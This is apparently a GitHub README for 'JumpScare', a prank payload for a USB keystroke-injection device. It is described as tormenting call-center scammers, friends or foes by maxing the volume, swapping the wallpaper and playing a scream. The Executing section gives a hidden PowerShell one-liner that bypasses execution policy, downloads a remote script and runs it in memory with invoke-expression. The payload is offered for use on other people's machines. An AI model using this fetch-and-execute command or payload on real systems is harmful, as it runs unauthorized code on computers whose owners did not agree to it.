![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# JumpScare A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes. ## Description This script starts off using Invoke-WebRequests to download both and Image and Sound file Their system volume is then turned up to the max level The script will be paused until a mouse movement is detected At that point there desktop wallpaper will be changed to the scary image provided and the scream sound effect will be played ## Getting Started ### Dependencies * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-JumpScare/JumpScare.ps1?dl=1; invoke-expression $pl ```

(back to top)

## Contributing All contributors names will be listed here I am Jakoby Arf

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube
Python
Twitter
Golang
Instagram
Jsonnet
Discord
Jsonnet
TikTok

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [MG](https://github.com/OMG-MG) * [0iphor13](https://github.com/0iphor13) * [PhilSutter](https://github.com/PhilSutter)

(back to top)